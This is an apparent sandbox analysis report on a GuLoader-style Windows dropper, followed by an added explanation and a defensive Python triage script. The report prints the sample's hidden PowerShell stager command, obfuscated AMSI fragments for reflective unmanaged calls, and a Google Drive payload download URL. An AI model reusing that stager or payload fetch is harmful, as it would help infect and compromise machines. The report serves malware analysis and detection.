00000006.00000003.2695758032.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2638305597.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2869016490.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2833248733.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2707422994.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626671600.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2879946897.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2970146989.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2684261462.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2788122541.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 
00000006.00000003.2856173350.0000000005EA3000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2992682795.0000000005EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=downloadC
    Source: Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: Anthranil.exe, 00000006.00000002.3013439177.0000000005E82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
    Source: Anthranil.exe, 00000006.00000002.3013439177.0000000005E82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
    Source: Anthranil.exe, 00000006.00000002.3013439177.0000000005E82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
    Source: Anthranil.exe, 00000006.00000002.3013439177.0000000005E82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
    Source: Anthranil.exe, 00000006.00000002.3013439177.0000000005E82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49202 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49209 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49251 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49268 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49283 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49314 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49324 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49326 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49328 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49330 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49332 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49334 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49336 version: TLS 1.2
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040571B

    System Summary

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Anthranil.exe
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Code function: 0_2_00406DC6
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Code function: 0_2_0040759D
    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll 01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
    Source: AM983ebb5F.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@6/13@2/2
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Code function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Code function: 0_2_004021AF CoCreateInstance
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | File created: C:\Users\user\AppData\Roaming\erstatningsgraden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | File created: C:\Users\user\AppData\Local\Temp\nsiD328.tmp
    Source: AM983ebb5F.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: AM983ebb5F.exe | ReversingLabs: Detection: 50%
    Source: AM983ebb5F.exe | Virustotal: Detection: 69%
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | File read: C:\Users\user\Desktop\AM983ebb5F.exe
    Source: unknown | Process created: C:\Users\user\Desktop\AM983ebb5F.exe "C:\Users\user\Desktop\AM983ebb5F.exe"
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Anthranil.exe "C:\Users\user\AppData\Local\Temp\Anthranil.exe"
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Anthranil.exe "C:\Users\user\AppData\Local\Temp\Anthranil.exe"
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: oleacc.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: shfolder.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: wintypes.dll (3 identical entries)
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Section loaded: textshaping.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 identical entries)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: powrprof.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: wkscli.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: umpdc.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: wininet.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: rasadhlp.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: schannel.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: mskeyprotect.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: dpapi.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: AM983ebb5F.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: mshtml.pdbUGP source: Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmp

    Data Obfuscation

    Source: Yara match | File source: 00000006.00000002.3009478955.000000000363A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Hanukkah $Vrftets $Frostproof), (Gaussbergite @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:gebyrobjekt = [AppDomain]::CurrentDomain.GetAssemblies()$glob
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Forlydendes)), $udkobler).DefineDynamicModule($Prdikeners, $false).DefineType($Dukkerne, $biethnic, [System.MulticastDelegate])$Gerhar
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Anthranil.exe
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | File created: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll
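    The PowerShell command line recorded above is the first stage of the loader: `gc -raw` reads the dropped Alternere.Mor file into one string, `.SubString(13958,3)` cuts three characters out of it at a fixed offset, and `.$Enedirektrs($Celeries)` applies the dot-source operator to a string-valued variable, which makes PowerShell run the command whose name is that string with the whole file as its argument. The report does not show which three characters sit at offset 13958; the script only runs if they name a command, and in stages of this kind that is usually `iex` (the Invoke-Expression alias). The two AMSI buffers show the second trick of the same stage: a delegate type is built by reflection (DefineDynamicAssembly / DefineDynamicModule / DefineType over System.MulticastDelegate) and bound to a raw function pointer with GetDelegateForFunctionPointer, so the script can call unmanaged exports without Add-Type, which would otherwise spawn csc.exe and write a temporary assembly to disk.

    The Python triage helper below is an added example, not Joe Sandbox code and not the sample's code. It extracts the read/SubString/invoke chain from a process-creation command line (any variable names, `gc`/`cat`/`type`/`Get-Content`, dot or `&` invocation, so it is more general than the single command line above), resolves the dispatcher token from a copy of the staged file, and flags the reflection-based delegate construction in AMSI buffers. The command line and the two AMSI fragments are copied from this report; the stage file content is constructed, with `iex` placed at offset 13958 as an assumption; the function names are mine.

    ```python
    """
    Triage helpers for a GuLoader-style PowerShell stage.

    Added example (not Joe Sandbox or sample code). The command line and the two
    AMSI fragments are copied from the report; the staged file below is constructed.
    """
    import re
    from typing import Optional

    # Command line from the report (powershell.exe child of the sample).
    CMDLINE = (
        'powershell.exe -windowstyle hidden "$Celeries=gc -raw '
        "'C:\\Users\\user\\AppData\\Roaming\\erstatningsgraden\\Alternere.Mor';"
        '$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "'
    )

    # Constructed stand-in for Alternere.Mor: 13958 characters of comment padding,
    # then the dispatcher token. The real token is not shown in the report; 'iex'
    # (alias of Invoke-Expression) is an assumption based on how these stages work.
    STAGE = "#" + "A" * 13956 + "\n" + "iex 'Write-Output stage2'\n"

    # AMSI buffer fragments copied from the report's Data Obfuscation section.
    AMSI_BUFFERS = [
        "GetDelegateForFunctionPointer((Hanukkah $Vrftets $Frostproof), "
        "(Gaussbergite @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))",
        "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Forlydendes)), "
        "$udkobler).DefineDynamicModule($Prdikeners, $false)"
        ".DefineType($Dukkerne, $biethnic, [System.MulticastDelegate])",
    ]

    RAW_READ_RE = re.compile(
        r"\$(?P<var>\w+)\s*=\s*(?:gc|cat|type|Get-Content)\s+-raw\s+'(?P<path>[^']+)'", re.I)
    SUBSTRING_RE = re.compile(
        r"\$(?P<var>\w+)\s*=\s*\$(?P<src>\w+)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)", re.I)
    # '.' (dot-source) or '&' (call) applied to a string-valued variable runs the
    # command named by that string; here the argument is the whole file content.
    INVOKE_RE = re.compile(r"[.&]\s*\$(?P<var>\w+)\s*\(\s*\$(?P<arg>\w+)\s*\)")

    KNOWN_DISPATCHERS = {"iex": "Invoke-Expression", "icm": "Invoke-Command"}

    # Markers of building a delegate type by reflection and binding it to a raw
    # function pointer: unmanaged calls without Add-Type (no csc.exe, nothing on disk).
    REFLECTIVE_MARKERS = ("DefineDynamicAssembly", "DefineDynamicModule", "DefineType",
                          "MulticastDelegate", "GetDelegateForFunctionPointer")


    def parse_dispatcher(cmdline: str) -> Optional[dict]:
        """Return the read -> SubString -> invoke chain only if the three pieces line up."""
        read = RAW_READ_RE.search(cmdline)
        sub = SUBSTRING_RE.search(cmdline)
        inv = INVOKE_RE.search(cmdline)
        if not (read and sub and inv):
            return None
        chained = (sub["src"] == read["var"] and inv["var"] == sub["var"]
                   and inv["arg"] == read["var"])
        if not chained:
            return None
        return {"stage_file": read["path"], "content_var": read["var"],
                "dispatch_var": sub["var"], "offset": int(sub["off"]), "length": int(sub["len"])}


    def resolve_token(stage_text: str, offset: int, length: int) -> Optional[str]:
        """Slice the staged file the way .SubString does. .NET indexes UTF-16 code
        units, so decode the file to str first; for ASCII stages char offset == byte offset."""
        if offset < 0 or offset + length > len(stage_text):
            return None
        return stage_text[offset:offset + length]


    def classify_token(token: Optional[str]) -> str:
        return KNOWN_DISPATCHERS.get((token or "").lower(), "unknown")


    def reflective_markers(buffers) -> list:
        joined = "\n".join(buffers).lower()
        return [m for m in REFLECTIVE_MARKERS if m.lower() in joined]


    def has_reflective_pinvoke(buffers) -> bool:
        # Delegate type defined by reflection AND bound to a function pointer.
        return {"MulticastDelegate", "GetDelegateForFunctionPointer"} <= set(reflective_markers(buffers))


    def triage(cmdline: str, stage_text: str, amsi_buffers) -> dict:
        findings, disp = [], parse_dispatcher(cmdline)
        if disp:
            disp["token"] = resolve_token(stage_text, disp["offset"], disp["length"])
            disp["resolved"] = classify_token(disp["token"])
            findings.append("staged-file substring dispatcher")
        if has_reflective_pinvoke(amsi_buffers):
            findings.append("reflective delegate P/Invoke")
        return {"dispatcher": disp, "findings": findings}


    if __name__ == "__main__":
        import json
        print(json.dumps(triage(CMDLINE, STAGE, AMSI_BUFFERS), indent=2))
    ```

    Two practical points. The offset and length in the command line are the cheapest pivot you get from a process-creation event alone: read the dropped file with the same decoding PowerShell would use and the token falls out, and a token that is not a command name means the chain was not meant to run on that file. The reflective delegate markers fire on the AMSI buffer, not on the command line, so this second check only works where AMSI script content is collected (Microsoft-Windows-PowerShell script block logging or an AMSI provider), which is exactly why such stages also try to disable or bypass AMSI.
    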

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
